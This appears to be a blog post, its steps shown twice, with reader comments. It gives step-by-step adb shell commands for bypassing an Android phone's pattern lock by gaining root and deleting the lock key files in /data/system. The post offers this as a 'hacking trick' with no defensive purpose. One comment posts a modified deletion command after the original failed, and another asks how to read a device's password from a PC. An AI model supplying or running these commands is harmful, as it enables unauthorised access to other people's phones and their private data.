Requirements for this Attack :
Step 1.
1.First Boot your Kali Linux Distribution
2.Connect your phone to your PC using USB
cable.
Step 2.
1. Open up Terminal
For Installing ADB over terminal
2.Boot into any Linux distro you have.
2.On your Terminal type :
#sudo apt-get install android-tools-adb
This will install ADB Android Tool on your Kali Linux Machine.
Step 3.
Disabling pattern unlock over terminal
1.Open up terminal again and type :
#adb devices
#adb shell
#cd data/system
#su
#rm *.key
Now,
disconnect your phone and reboot.
Unlock pattern should be here.
Just try some random gesture and it will get unlocked.
Enjoy the Hacking Tricks by Tapan Jha (Cyber Security Expert)
- Kali Linux
- An Android phone
- USB cable
- ADB Android Tool
Step 1.
1.First Boot your Kali Linux Distribution
2.Connect your phone to your PC using USB
cable.
Step 2.
1. Open up Terminal
For Installing ADB over terminal
2.Boot into any Linux distro you have.
2.On your Terminal type :
#sudo apt-get install android-tools-adb
This will install ADB Android Tool on your Kali Linux Machine.
Step 3.
Disabling pattern unlock over terminal
1.Open up terminal again and type :
#adb devices
#adb shell
#cd data/system
#su
#rm *.key
Now,
disconnect your phone and reboot.
Unlock pattern should be here.
Just try some random gesture and it will get unlocked.
Enjoy the Hacking Tricks by Tapan Jha (Cyber Security Expert)
rm*.key not found
ReplyDeletei made a change and it worked #rm *.*key
Deletecan unlock the android for a while without removing the lock
ReplyDeleteor can we see the password by connecting it to a pc